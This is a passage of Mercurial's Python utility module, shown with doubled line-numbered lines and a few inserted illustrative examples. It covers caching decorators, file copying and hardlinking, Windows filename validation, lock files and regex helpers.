1724 order = collections.deque()
1724 order = collections.deque()
1725 if func.__code__.co_argcount == 1:
1725 if func.__code__.co_argcount == 1:
1726
1726
1727 def f(arg):
1727 def f(arg):
1728 if arg not in cache:
1728 if arg not in cache:
1729 if len(cache) > 20:
1729 if len(cache) > 20:
1730 del cache[order.popleft()]
1730 del cache[order.popleft()]
1731 cache[arg] = func(arg)
1731 cache[arg] = func(arg)
1732 else:
1732 else:
1733 order.remove(arg)
1733 order.remove(arg)
1734 order.append(arg)
1734 order.append(arg)
1735 return cache[arg]
1735 return cache[arg]
1736
1736
1737 else:
1737 else:
1738
1738
1739 def f(*args):
1739 def f(*args):
1740 if args not in cache:
1740 if args not in cache:
1741 if len(cache) > 20:
1741 if len(cache) > 20:
1742 del cache[order.popleft()]
1742 del cache[order.popleft()]
1743 cache[args] = func(*args)
1743 cache[args] = func(*args)
1744 else:
1744 else:
1745 order.remove(args)
1745 order.remove(args)
1746 order.append(args)
1746 order.append(args)
1747 return cache[args]
1747 return cache[args]
1748
1748
1749 return f
1749 return f
1750
1750
1751
1751
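# Illustrative sketch (not part of the original source): memoizing a
# single-argument function with lrucachefunc().
def _lrucachefunc_example():
    calls = []

    def square(x):
        calls.append(x)
        return x * x

    cached = lrucachefunc(square)
    assert cached(3) == 9
    assert cached(3) == 9
    # the wrapped function only ran once for the repeated argument
    assert calls == [3]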
1752 class propertycache(object):
1752 class propertycache(object):
1753 def __init__(self, func):
1753 def __init__(self, func):
1754 self.func = func
1754 self.func = func
1755 self.name = func.__name__
1755 self.name = func.__name__
1756
1756
1757 def __get__(self, obj, type=None):
1757 def __get__(self, obj, type=None):
1758 result = self.func(obj)
1758 result = self.func(obj)
1759 self.cachevalue(obj, result)
1759 self.cachevalue(obj, result)
1760 return result
1760 return result
1761
1761
1762 def cachevalue(self, obj, value):
1762 def cachevalue(self, obj, value):
1763 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1763 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1764 obj.__dict__[self.name] = value
1764 obj.__dict__[self.name] = value
1765
1765
1766
1766
1767 def clearcachedproperty(obj, prop):
1767 def clearcachedproperty(obj, prop):
1768 '''clear a cached property value, if one has been set'''
1768 '''clear a cached property value, if one has been set'''
1769 prop = pycompat.sysstr(prop)
1769 prop = pycompat.sysstr(prop)
1770 if prop in obj.__dict__:
1770 if prop in obj.__dict__:
1771 del obj.__dict__[prop]
1771 del obj.__dict__[prop]
1772
1772
1773
1773
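# Illustrative sketch (not part of the original source): propertycache
# computes a value once and stores it in the instance __dict__;
# clearcachedproperty() forces recomputation on the next access.
def _propertycache_example():
    runs = [0]

    class thing(object):
        @propertycache
        def expensive(self):
            runs[0] += 1
            return 42

    t = thing()
    assert t.expensive == 42
    assert t.expensive == 42
    assert runs[0] == 1  # cached in t.__dict__ after the first access
    clearcachedproperty(t, b'expensive')
    assert t.expensive == 42
    assert runs[0] == 2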
1774 def increasingchunks(source, min=1024, max=65536):
1774 def increasingchunks(source, min=1024, max=65536):
1775 """return no less than min bytes per chunk while data remains,
1775 """return no less than min bytes per chunk while data remains,
1776 doubling min after each chunk until it reaches max"""
1776 doubling min after each chunk until it reaches max"""
1777
1777
1778 def log2(x):
1778 def log2(x):
1779 if not x:
1779 if not x:
1780 return 0
1780 return 0
1781 i = 0
1781 i = 0
1782 while x:
1782 while x:
1783 x >>= 1
1783 x >>= 1
1784 i += 1
1784 i += 1
1785 return i - 1
1785 return i - 1
1786
1786
1787 buf = []
1787 buf = []
1788 blen = 0
1788 blen = 0
1789 for chunk in source:
1789 for chunk in source:
1790 buf.append(chunk)
1790 buf.append(chunk)
1791 blen += len(chunk)
1791 blen += len(chunk)
1792 if blen >= min:
1792 if blen >= min:
1793 if min < max:
1793 if min < max:
1794 min = min << 1
1794 min = min << 1
1795 nmin = 1 << log2(blen)
1795 nmin = 1 << log2(blen)
1796 if nmin > min:
1796 if nmin > min:
1797 min = nmin
1797 min = nmin
1798 if min > max:
1798 if min > max:
1799 min = max
1799 min = max
1800 yield b''.join(buf)
1800 yield b''.join(buf)
1801 blen = 0
1801 blen = 0
1802 buf = []
1802 buf = []
1803 if buf:
1803 if buf:
1804 yield b''.join(buf)
1804 yield b''.join(buf)
1805
1805
1806
1806
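# Illustrative sketch (not part of the original source): increasingchunks()
# re-batches a stream of small pieces into progressively larger chunks.
def _increasingchunks_example():
    pieces = (b'x' * 1024 for _ in range(16))
    sizes = [len(c) for c in increasingchunks(pieces, min=1024, max=8192)]
    assert sum(sizes) == 16 * 1024  # no data is lost
    assert sizes[0] == 1024  # the first chunk honours the initial minimum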
1807 def always(fn):
1807 def always(fn):
1808 return True
1808 return True
1809
1809
1810
1810
1811 def never(fn):
1811 def never(fn):
1812 return False
1812 return False
1813
1813
1814
1814
1815 def nogc(func):
1815 def nogc(func):
1816 """disable garbage collector
1816 """disable garbage collector
1817
1817
1818 Python's garbage collector triggers a GC each time a certain number of
1818 Python's garbage collector triggers a GC each time a certain number of
1819 container objects (the number being defined by gc.get_threshold()) are
1819 container objects (the number being defined by gc.get_threshold()) are
1820 allocated even when marked not to be tracked by the collector. Tracking has
1820 allocated even when marked not to be tracked by the collector. Tracking has
1821 no effect on when GCs are triggered, only on what objects the GC looks
1821 no effect on when GCs are triggered, only on what objects the GC looks
1822 into. As a workaround, disable GC while building complex (huge)
1822 into. As a workaround, disable GC while building complex (huge)
1823 containers.
1823 containers.
1824
1824
1825 This garbage collector issue has been fixed in 2.7, but it still affects
1825 This garbage collector issue has been fixed in 2.7, but it still affects
1826 CPython's performance.
1826 CPython's performance.
1827 """
1827 """
1828
1828
1829 def wrapper(*args, **kwargs):
1829 def wrapper(*args, **kwargs):
1830 gcenabled = gc.isenabled()
1830 gcenabled = gc.isenabled()
1831 gc.disable()
1831 gc.disable()
1832 try:
1832 try:
1833 return func(*args, **kwargs)
1833 return func(*args, **kwargs)
1834 finally:
1834 finally:
1835 if gcenabled:
1835 if gcenabled:
1836 gc.enable()
1836 gc.enable()
1837
1837
1838 return wrapper
1838 return wrapper
1839
1839
1840
1840
1841 if pycompat.ispypy:
1841 if pycompat.ispypy:
1842 # PyPy runs slower with gc disabled
1842 # PyPy runs slower with gc disabled
1843 nogc = lambda x: x
1843 nogc = lambda x: x
1844
1844
1845
1845
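# Illustrative sketch (not part of the original source): nogc used as a
# decorator around code that builds a large container (on PyPy it is a
# no-op, per the assignment above).
@nogc
def _build_big_mapping_example(n):
    return {i: i * i for i in range(n)}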
1846 def pathto(root, n1, n2):
1846 def pathto(root, n1, n2):
1847 # type: (bytes, bytes, bytes) -> bytes
1847 # type: (bytes, bytes, bytes) -> bytes
1848 """return the relative path from one place to another.
1848 """return the relative path from one place to another.
1849 root should use os.sep to separate directories
1849 root should use os.sep to separate directories
1850 n1 should use os.sep to separate directories
1850 n1 should use os.sep to separate directories
1851 n2 should use "/" to separate directories
1851 n2 should use "/" to separate directories
1852 returns an os.sep-separated path.
1852 returns an os.sep-separated path.
1853
1853
1854 If n1 is a relative path, it's assumed it's
1854 If n1 is a relative path, it's assumed it's
1855 relative to root.
1855 relative to root.
1856 n2 should always be relative to root.
1856 n2 should always be relative to root.
1857 """
1857 """
1858 if not n1:
1858 if not n1:
1859 return localpath(n2)
1859 return localpath(n2)
1860 if os.path.isabs(n1):
1860 if os.path.isabs(n1):
1861 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1861 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1862 return os.path.join(root, localpath(n2))
1862 return os.path.join(root, localpath(n2))
1863 n2 = b'/'.join((pconvert(root), n2))
1863 n2 = b'/'.join((pconvert(root), n2))
1864 a, b = splitpath(n1), n2.split(b'/')
1864 a, b = splitpath(n1), n2.split(b'/')
1865 a.reverse()
1865 a.reverse()
1866 b.reverse()
1866 b.reverse()
1867 while a and b and a[-1] == b[-1]:
1867 while a and b and a[-1] == b[-1]:
1868 a.pop()
1868 a.pop()
1869 b.pop()
1869 b.pop()
1870 b.reverse()
1870 b.reverse()
1871 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1871 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1872
1872
1873
1873
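# Illustrative sketch (not part of the original source): relative path
# computation with pathto() on a POSIX system (os.sep == '/').
def _pathto_example():
    assert pathto(b'/repo', b'a/b', b'a/c/d') == b'../c/d'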
1874 def checksignature(func, depth=1):
1874 def checksignature(func, depth=1):
1875 '''wrap a function with code to check for calling errors'''
1875 '''wrap a function with code to check for calling errors'''
1876
1876
1877 def check(*args, **kwargs):
1877 def check(*args, **kwargs):
1878 try:
1878 try:
1879 return func(*args, **kwargs)
1879 return func(*args, **kwargs)
1880 except TypeError:
1880 except TypeError:
1881 if len(traceback.extract_tb(sys.exc_info()[2])) == depth:
1881 if len(traceback.extract_tb(sys.exc_info()[2])) == depth:
1882 raise error.SignatureError
1882 raise error.SignatureError
1883 raise
1883 raise
1884
1884
1885 return check
1885 return check
1886
1886
1887
1887
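# Illustrative sketch (not part of the original source): checksignature()
# turns a TypeError caused by calling with the wrong arguments into a
# SignatureError, while TypeErrors raised inside the function still escape.
def _checksignature_example():
    def takesone(x):
        return x

    checked = checksignature(takesone)
    try:
        checked()  # called with too few arguments
    except error.SignatureError:
        pass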
1888 # a whitelist of known filesystems where hardlinks work reliably
1888 # a whitelist of known filesystems where hardlinks work reliably
1889 _hardlinkfswhitelist = {
1889 _hardlinkfswhitelist = {
1890 b'apfs',
1890 b'apfs',
1891 b'btrfs',
1891 b'btrfs',
1892 b'ext2',
1892 b'ext2',
1893 b'ext3',
1893 b'ext3',
1894 b'ext4',
1894 b'ext4',
1895 b'hfs',
1895 b'hfs',
1896 b'jfs',
1896 b'jfs',
1897 b'NTFS',
1897 b'NTFS',
1898 b'reiserfs',
1898 b'reiserfs',
1899 b'tmpfs',
1899 b'tmpfs',
1900 b'ufs',
1900 b'ufs',
1901 b'xfs',
1901 b'xfs',
1902 b'zfs',
1902 b'zfs',
1903 }
1903 }
1904
1904
1905
1905
1906 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1906 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1907 """copy a file, preserving mode and optionally other stat info like
1907 """copy a file, preserving mode and optionally other stat info like
1908 atime/mtime
1908 atime/mtime
1909
1909
1910 checkambig argument is used with filestat, and is useful only if
1910 checkambig argument is used with filestat, and is useful only if
1911 destination file is guarded by any lock (e.g. repo.lock or
1911 destination file is guarded by any lock (e.g. repo.lock or
1912 repo.wlock).
1912 repo.wlock).
1913
1913
1914 copystat and checkambig should be exclusive.
1914 copystat and checkambig should be exclusive.
1915 """
1915 """
1916 assert not (copystat and checkambig)
1916 assert not (copystat and checkambig)
1917 oldstat = None
1917 oldstat = None
1918 if os.path.lexists(dest):
1918 if os.path.lexists(dest):
1919 if checkambig:
1919 if checkambig:
1920 oldstat = checkambig and filestat.frompath(dest)
1920 oldstat = checkambig and filestat.frompath(dest)
1921 unlink(dest)
1921 unlink(dest)
1922 if hardlink:
1922 if hardlink:
1923 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1923 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1924 # unless we are confident that dest is on a whitelisted filesystem.
1924 # unless we are confident that dest is on a whitelisted filesystem.
1925 try:
1925 try:
1926 fstype = getfstype(os.path.dirname(dest))
1926 fstype = getfstype(os.path.dirname(dest))
1927 except OSError:
1927 except OSError:
1928 fstype = None
1928 fstype = None
1929 if fstype not in _hardlinkfswhitelist:
1929 if fstype not in _hardlinkfswhitelist:
1930 hardlink = False
1930 hardlink = False
1931 if hardlink:
1931 if hardlink:
1932 try:
1932 try:
1933 oslink(src, dest)
1933 oslink(src, dest)
1934 return
1934 return
1935 except (IOError, OSError):
1935 except (IOError, OSError):
1936 pass # fall back to normal copy
1936 pass # fall back to normal copy
1937 if os.path.islink(src):
1937 if os.path.islink(src):
1938 os.symlink(os.readlink(src), dest)
1938 os.symlink(os.readlink(src), dest)
1939 # copytime is ignored for symlinks, but in general copytime isn't needed
1939 # copytime is ignored for symlinks, but in general copytime isn't needed
1940 # for them anyway
1940 # for them anyway
1941 else:
1941 else:
1942 try:
1942 try:
1943 shutil.copyfile(src, dest)
1943 shutil.copyfile(src, dest)
1944 if copystat:
1944 if copystat:
1945 # copystat also copies mode
1945 # copystat also copies mode
1946 shutil.copystat(src, dest)
1946 shutil.copystat(src, dest)
1947 else:
1947 else:
1948 shutil.copymode(src, dest)
1948 shutil.copymode(src, dest)
1949 if oldstat and oldstat.stat:
1949 if oldstat and oldstat.stat:
1950 newstat = filestat.frompath(dest)
1950 newstat = filestat.frompath(dest)
1951 if newstat.isambig(oldstat):
1951 if newstat.isambig(oldstat):
1952 # stat of copied file is ambiguous to original one
1952 # stat of copied file is ambiguous to original one
1953 advanced = (
1953 advanced = (
1954 oldstat.stat[stat.ST_MTIME] + 1
1954 oldstat.stat[stat.ST_MTIME] + 1
1955 ) & 0x7FFFFFFF
1955 ) & 0x7FFFFFFF
1956 os.utime(dest, (advanced, advanced))
1956 os.utime(dest, (advanced, advanced))
1957 except shutil.Error as inst:
1957 except shutil.Error as inst:
1958 raise error.Abort(stringutil.forcebytestr(inst))
1958 raise error.Abort(stringutil.forcebytestr(inst))
1959
1959
1960
1960
1961 def copyfiles(src, dst, hardlink=None, progress=None):
1961 def copyfiles(src, dst, hardlink=None, progress=None):
1962 """Copy a directory tree using hardlinks if possible."""
1962 """Copy a directory tree using hardlinks if possible."""
1963 num = 0
1963 num = 0
1964
1964
1965 def settopic():
1965 def settopic():
1966 if progress:
1966 if progress:
1967 progress.topic = _(b'linking') if hardlink else _(b'copying')
1967 progress.topic = _(b'linking') if hardlink else _(b'copying')
1968
1968
1969 if os.path.isdir(src):
1969 if os.path.isdir(src):
1970 if hardlink is None:
1970 if hardlink is None:
1971 hardlink = (
1971 hardlink = (
1972 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1972 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1973 )
1973 )
1974 settopic()
1974 settopic()
1975 os.mkdir(dst)
1975 os.mkdir(dst)
1976 for name, kind in listdir(src):
1976 for name, kind in listdir(src):
1977 srcname = os.path.join(src, name)
1977 srcname = os.path.join(src, name)
1978 dstname = os.path.join(dst, name)
1978 dstname = os.path.join(dst, name)
1979 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1979 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1980 num += n
1980 num += n
1981 else:
1981 else:
1982 if hardlink is None:
1982 if hardlink is None:
1983 hardlink = (
1983 hardlink = (
1984 os.stat(os.path.dirname(src)).st_dev
1984 os.stat(os.path.dirname(src)).st_dev
1985 == os.stat(os.path.dirname(dst)).st_dev
1985 == os.stat(os.path.dirname(dst)).st_dev
1986 )
1986 )
1987 settopic()
1987 settopic()
1988
1988
1989 if hardlink:
1989 if hardlink:
1990 try:
1990 try:
1991 oslink(src, dst)
1991 oslink(src, dst)
1992 except (IOError, OSError):
1992 except (IOError, OSError):
1993 hardlink = False
1993 hardlink = False
1994 shutil.copy(src, dst)
1994 shutil.copy(src, dst)
1995 else:
1995 else:
1996 shutil.copy(src, dst)
1996 shutil.copy(src, dst)
1997 num += 1
1997 num += 1
1998 if progress:
1998 if progress:
1999 progress.increment()
1999 progress.increment()
2000
2000
2001 return hardlink, num
2001 return hardlink, num
2002
2002
2003
2003
2004 _winreservednames = {
2004 _winreservednames = {
2005 b'con',
2005 b'con',
2006 b'prn',
2006 b'prn',
2007 b'aux',
2007 b'aux',
2008 b'nul',
2008 b'nul',
2009 b'com1',
2009 b'com1',
2010 b'com2',
2010 b'com2',
2011 b'com3',
2011 b'com3',
2012 b'com4',
2012 b'com4',
2013 b'com5',
2013 b'com5',
2014 b'com6',
2014 b'com6',
2015 b'com7',
2015 b'com7',
2016 b'com8',
2016 b'com8',
2017 b'com9',
2017 b'com9',
2018 b'lpt1',
2018 b'lpt1',
2019 b'lpt2',
2019 b'lpt2',
2020 b'lpt3',
2020 b'lpt3',
2021 b'lpt4',
2021 b'lpt4',
2022 b'lpt5',
2022 b'lpt5',
2023 b'lpt6',
2023 b'lpt6',
2024 b'lpt7',
2024 b'lpt7',
2025 b'lpt8',
2025 b'lpt8',
2026 b'lpt9',
2026 b'lpt9',
2027 }
2027 }
2028 _winreservedchars = b':*?"<>|'
2028 _winreservedchars = b':*?"<>|'
2029
2029
2030
2030
2031 def checkwinfilename(path):
2031 def checkwinfilename(path):
2032 # type: (bytes) -> Optional[bytes]
2032 # type: (bytes) -> Optional[bytes]
2033 r"""Check that the base-relative path is a valid filename on Windows.
2033 r"""Check that the base-relative path is a valid filename on Windows.
2034 Returns None if the path is ok, or a UI string describing the problem.
2034 Returns None if the path is ok, or a UI string describing the problem.
2035
2035
2036 >>> checkwinfilename(b"just/a/normal/path")
2036 >>> checkwinfilename(b"just/a/normal/path")
2037 >>> checkwinfilename(b"foo/bar/con.xml")
2037 >>> checkwinfilename(b"foo/bar/con.xml")
2038 "filename contains 'con', which is reserved on Windows"
2038 "filename contains 'con', which is reserved on Windows"
2039 >>> checkwinfilename(b"foo/con.xml/bar")
2039 >>> checkwinfilename(b"foo/con.xml/bar")
2040 "filename contains 'con', which is reserved on Windows"
2040 "filename contains 'con', which is reserved on Windows"
2041 >>> checkwinfilename(b"foo/bar/xml.con")
2041 >>> checkwinfilename(b"foo/bar/xml.con")
2042 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2042 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2043 "filename contains 'AUX', which is reserved on Windows"
2043 "filename contains 'AUX', which is reserved on Windows"
2044 >>> checkwinfilename(b"foo/bar/bla:.txt")
2044 >>> checkwinfilename(b"foo/bar/bla:.txt")
2045 "filename contains ':', which is reserved on Windows"
2045 "filename contains ':', which is reserved on Windows"
2046 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2046 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2047 "filename contains '\\x07', which is invalid on Windows"
2047 "filename contains '\\x07', which is invalid on Windows"
2048 >>> checkwinfilename(b"foo/bar/bla ")
2048 >>> checkwinfilename(b"foo/bar/bla ")
2049 "filename ends with ' ', which is not allowed on Windows"
2049 "filename ends with ' ', which is not allowed on Windows"
2050 >>> checkwinfilename(b"../bar")
2050 >>> checkwinfilename(b"../bar")
2051 >>> checkwinfilename(b"foo\\")
2051 >>> checkwinfilename(b"foo\\")
2052 "filename ends with '\\', which is invalid on Windows"
2052 "filename ends with '\\', which is invalid on Windows"
2053 >>> checkwinfilename(b"foo\\/bar")
2053 >>> checkwinfilename(b"foo\\/bar")
2054 "directory name ends with '\\', which is invalid on Windows"
2054 "directory name ends with '\\', which is invalid on Windows"
2055 """
2055 """
2056 if path.endswith(b'\\'):
2056 if path.endswith(b'\\'):
2057 return _(b"filename ends with '\\', which is invalid on Windows")
2057 return _(b"filename ends with '\\', which is invalid on Windows")
2058 if b'\\/' in path:
2058 if b'\\/' in path:
2059 return _(b"directory name ends with '\\', which is invalid on Windows")
2059 return _(b"directory name ends with '\\', which is invalid on Windows")
2060 for n in path.replace(b'\\', b'/').split(b'/'):
2060 for n in path.replace(b'\\', b'/').split(b'/'):
2061 if not n:
2061 if not n:
2062 continue
2062 continue
2063 for c in _filenamebytestr(n):
2063 for c in _filenamebytestr(n):
2064 if c in _winreservedchars:
2064 if c in _winreservedchars:
2065 return (
2065 return (
2066 _(
2066 _(
2067 b"filename contains '%s', which is reserved "
2067 b"filename contains '%s', which is reserved "
2068 b"on Windows"
2068 b"on Windows"
2069 )
2069 )
2070 % c
2070 % c
2071 )
2071 )
2072 if ord(c) <= 31:
2072 if ord(c) <= 31:
2073 return _(
2073 return _(
2074 b"filename contains '%s', which is invalid on Windows"
2074 b"filename contains '%s', which is invalid on Windows"
2075 ) % stringutil.escapestr(c)
2075 ) % stringutil.escapestr(c)
2076 base = n.split(b'.')[0]
2076 base = n.split(b'.')[0]
2077 if base and base.lower() in _winreservednames:
2077 if base and base.lower() in _winreservednames:
2078 return (
2078 return (
2079 _(b"filename contains '%s', which is reserved on Windows")
2079 _(b"filename contains '%s', which is reserved on Windows")
2080 % base
2080 % base
2081 )
2081 )
2082 t = n[-1:]
2082 t = n[-1:]
2083 if t in b'. ' and n not in b'..':
2083 if t in b'. ' and n not in b'..':
2084 return (
2084 return (
2085 _(
2085 _(
2086 b"filename ends with '%s', which is not allowed "
2086 b"filename ends with '%s', which is not allowed "
2087 b"on Windows"
2087 b"on Windows"
2088 )
2088 )
2089 % t
2089 % t
2090 )
2090 )
2091
2091
2092
2092
2093 timer = getattr(time, "perf_counter", None)
2093 timer = getattr(time, "perf_counter", None)
2094
2094
2095 if pycompat.iswindows:
2095 if pycompat.iswindows:
2096 checkosfilename = checkwinfilename
2096 checkosfilename = checkwinfilename
2097 if not timer:
2097 if not timer:
2098 timer = time.clock
2098 timer = time.clock
2099 else:
2099 else:
2100 # mercurial.windows doesn't have platform.checkosfilename
2100 # mercurial.windows doesn't have platform.checkosfilename
2101 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2101 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2102 if not timer:
2102 if not timer:
2103 timer = time.time
2103 timer = time.time
2104
2104
2105
2105
2106 def makelock(info, pathname):
2106 def makelock(info, pathname):
2107 """Create a lock file atomically if possible
2107 """Create a lock file atomically if possible
2108
2108
2109 This may leave a stale lock file if symlink isn't supported and signal
2109 This may leave a stale lock file if symlink isn't supported and signal
2110 interrupt is enabled.
2110 interrupt is enabled.
2111 """
2111 """
2112 try:
2112 try:
2113 return os.symlink(info, pathname)
2113 return os.symlink(info, pathname)
2114 except OSError as why:
2114 except OSError as why:
2115 if why.errno == errno.EEXIST:
2115 if why.errno == errno.EEXIST:
2116 raise
2116 raise
2117 except AttributeError: # no symlink in os
2117 except AttributeError: # no symlink in os
2118 pass
2118 pass
2119
2119
2120 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2120 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2121 ld = os.open(pathname, flags)
2121 ld = os.open(pathname, flags)
2122 os.write(ld, info)
2122 os.write(ld, info)
2123 os.close(ld)
2123 os.close(ld)
2124
2124
2125
2125
2126 def readlock(pathname):
2126 def readlock(pathname):
2127 # type: (bytes) -> bytes
2127 # type: (bytes) -> bytes
2128 try:
2128 try:
2129 return readlink(pathname)
2129 return readlink(pathname)
2130 except OSError as why:
2130 except OSError as why:
2131 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2131 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2132 raise
2132 raise
2133 except AttributeError: # no symlink in os
2133 except AttributeError: # no symlink in os
2134 pass
2134 pass
2135 with posixfile(pathname, b'rb') as fp:
2135 with posixfile(pathname, b'rb') as fp:
2136 return fp.read()
2136 return fp.read()
2137
2137
2138
2138
2139 def fstat(fp):
2139 def fstat(fp):
2140 '''stat file object that may not have fileno method.'''
2140 '''stat file object that may not have fileno method.'''
2141 try:
2141 try:
2142 return os.fstat(fp.fileno())
2142 return os.fstat(fp.fileno())
2143 except AttributeError:
2143 except AttributeError:
2144 return os.stat(fp.name)
2144 return os.stat(fp.name)
2145
2145
2146
2146
2147 # File system features
2147 # File system features
2148
2148
2149
2149
2150 def fscasesensitive(path):
2150 def fscasesensitive(path):
2151 # type: (bytes) -> bool
2151 # type: (bytes) -> bool
2152 """
2152 """
2153 Return true if the given path is on a case-sensitive filesystem
2153 Return true if the given path is on a case-sensitive filesystem
2154
2154
2155 Requires a path (like /foo/.hg) ending with a foldable final
2155 Requires a path (like /foo/.hg) ending with a foldable final
2156 directory component.
2156 directory component.
2157 """
2157 """
2158 s1 = os.lstat(path)
2158 s1 = os.lstat(path)
2159 d, b = os.path.split(path)
2159 d, b = os.path.split(path)
2160 b2 = b.upper()
2160 b2 = b.upper()
2161 if b == b2:
2161 if b == b2:
2162 b2 = b.lower()
2162 b2 = b.lower()
2163 if b == b2:
2163 if b == b2:
2164 return True # no evidence against case sensitivity
2164 return True # no evidence against case sensitivity
2165 p2 = os.path.join(d, b2)
2165 p2 = os.path.join(d, b2)
2166 try:
2166 try:
2167 s2 = os.lstat(p2)
2167 s2 = os.lstat(p2)
2168 if s2 == s1:
2168 if s2 == s1:
2169 return False
2169 return False
2170 return True
2170 return True
2171 except OSError:
2171 except OSError:
2172 return True
2172 return True
2173
2173
2174
2174
2175 try:
2175 try:
2176 import re2 # pytype: disable=import-error
2176 import re2 # pytype: disable=import-error
2177
2177
2178 _re2 = None
2178 _re2 = None
2179 except ImportError:
2179 except ImportError:
2180 _re2 = False
2180 _re2 = False
2181
2181
2182
2182
2183 class _re(object):
2183 class _re(object):
2184 def _checkre2(self):
2184 def _checkre2(self):
2185 global _re2
2185 global _re2
2186 try:
2186 try:
2187 # check if match works, see issue3964
2187 # check if match works, see issue3964
2188 _re2 = bool(re2.match(br'\[([^\[]+)\]', b'[ui]'))
2188 _re2 = bool(re2.match(br'\[([^\[]+)\]', b'[ui]'))
2189 except ImportError:
2189 except ImportError:
2190 _re2 = False
2190 _re2 = False
2191
2191
2192 def compile(self, pat, flags=0):
2192 def compile(self, pat, flags=0):
2193 """Compile a regular expression, using re2 if possible
2193 """Compile a regular expression, using re2 if possible
2194
2194
2195 For best performance, use only re2-compatible regexp features. The
2195 For best performance, use only re2-compatible regexp features. The
2196 only flags from the re module that are re2-compatible are
2196 only flags from the re module that are re2-compatible are
2197 IGNORECASE and MULTILINE."""
2197 IGNORECASE and MULTILINE."""
2198 if _re2 is None:
2198 if _re2 is None:
2199 self._checkre2()
2199 self._checkre2()
2200 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2200 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2201 if flags & remod.IGNORECASE:
2201 if flags & remod.IGNORECASE:
2202 pat = b'(?i)' + pat
2202 pat = b'(?i)' + pat
2203 if flags & remod.MULTILINE:
2203 if flags & remod.MULTILINE:
2204 pat = b'(?m)' + pat
2204 pat = b'(?m)' + pat
2205 try:
2205 try:
2206 return re2.compile(pat)
2206 return re2.compile(pat)
2207 except re2.error:
2207 except re2.error:
2208 pass
2208 pass
2209 return remod.compile(pat, flags)
2209 return remod.compile(pat, flags)
2210
2210
2211 @propertycache
2211 @propertycache
2212 def escape(self):
2212 def escape(self):
2213 """Return the version of escape corresponding to self.compile.
2213 """Return the version of escape corresponding to self.compile.
2214
2214
2215 This is imperfect because whether re2 or re is used for a particular
2215 This is imperfect because whether re2 or re is used for a particular
2216 function depends on the flags, etc, but it's the best we can do.
2216 function depends on the flags, etc, but it's the best we can do.
2217 """
2217 """
2218 global _re2
2218 global _re2
2219 if _re2 is None:
2219 if _re2 is None:
2220 self._checkre2()
2220 self._checkre2()
2221 if _re2:
2221 if _re2:
2222 return re2.escape
2222 return re2.escape
2223 else:
2223 else:
2224 return remod.escape
2224 return remod.escape
2225
2225
2226
2226
2227 re = _re()
2227 re = _re()
2228
2228
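# Illustrative sketch (not part of the original source): the module-level
# `re` object prefers re2 when it is usable and silently falls back to the
# standard library otherwise.
def _re_wrapper_example():
    pat = re.compile(br'^[0-9a-f]{12,40}$')
    assert pat.match(b'1ecf0823ffff')
    assert not pat.match(b'not-a-hash')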
2229 _fspathcache = {}
2229 _fspathcache = {}
2230
2230
2231
2231
2232 def fspath(name, root):
2232 def fspath(name, root):
2233 # type: (bytes, bytes) -> bytes
2233 # type: (bytes, bytes) -> bytes
2234 """Get name in the case stored in the filesystem
2234 """Get name in the case stored in the filesystem
2235
2235
2236 The name should be relative to root, and be normcase-ed for efficiency.
2236 The name should be relative to root, and be normcase-ed for efficiency.
2237
2237
2238 Note that this function is unnecessary, and should not be
2238 Note that this function is unnecessary, and should not be
2239 called, for case-sensitive filesystems (simply because it's expensive).
2239 called, for case-sensitive filesystems (simply because it's expensive).
2240
2240
2241 The root should be normcase-ed, too.
2241 The root should be normcase-ed, too.
2242 """
2242 """
2243
2243
2244 def _makefspathcacheentry(dir):
2244 def _makefspathcacheentry(dir):
2245 return {normcase(n): n for n in os.listdir(dir)}
2245 return {normcase(n): n for n in os.listdir(dir)}
2246
2246
2247 seps = pycompat.ossep
2247 seps = pycompat.ossep
2248 if pycompat.osaltsep:
2248 if pycompat.osaltsep:
2249 seps = seps + pycompat.osaltsep
2249 seps = seps + pycompat.osaltsep
2250 # Protect backslashes. This gets silly very quickly.
2250 # Protect backslashes. This gets silly very quickly.
2251 seps.replace(b'\\', b'\\\\')
2251 seps.replace(b'\\', b'\\\\')
2252 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2252 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2253 dir = os.path.normpath(root)
2253 dir = os.path.normpath(root)
2254 result = []
2254 result = []
2255 for part, sep in pattern.findall(name):
2255 for part, sep in pattern.findall(name):
2256 if sep:
2256 if sep:
2257 result.append(sep)
2257 result.append(sep)
2258 continue
2258 continue
2259
2259
2260 if dir not in _fspathcache:
2260 if dir not in _fspathcache:
2261 _fspathcache[dir] = _makefspathcacheentry(dir)
2261 _fspathcache[dir] = _makefspathcacheentry(dir)
2262 contents = _fspathcache[dir]
2262 contents = _fspathcache[dir]
2263
2263
2264 found = contents.get(part)
2264 found = contents.get(part)
2265 if not found:
2265 if not found:
2266 # retry "once per directory" per "dirstate.walk" which
2266 # retry "once per directory" per "dirstate.walk" which
2267 # may take place for each patch of "hg qpush", for example
2267 # may take place for each patch of "hg qpush", for example
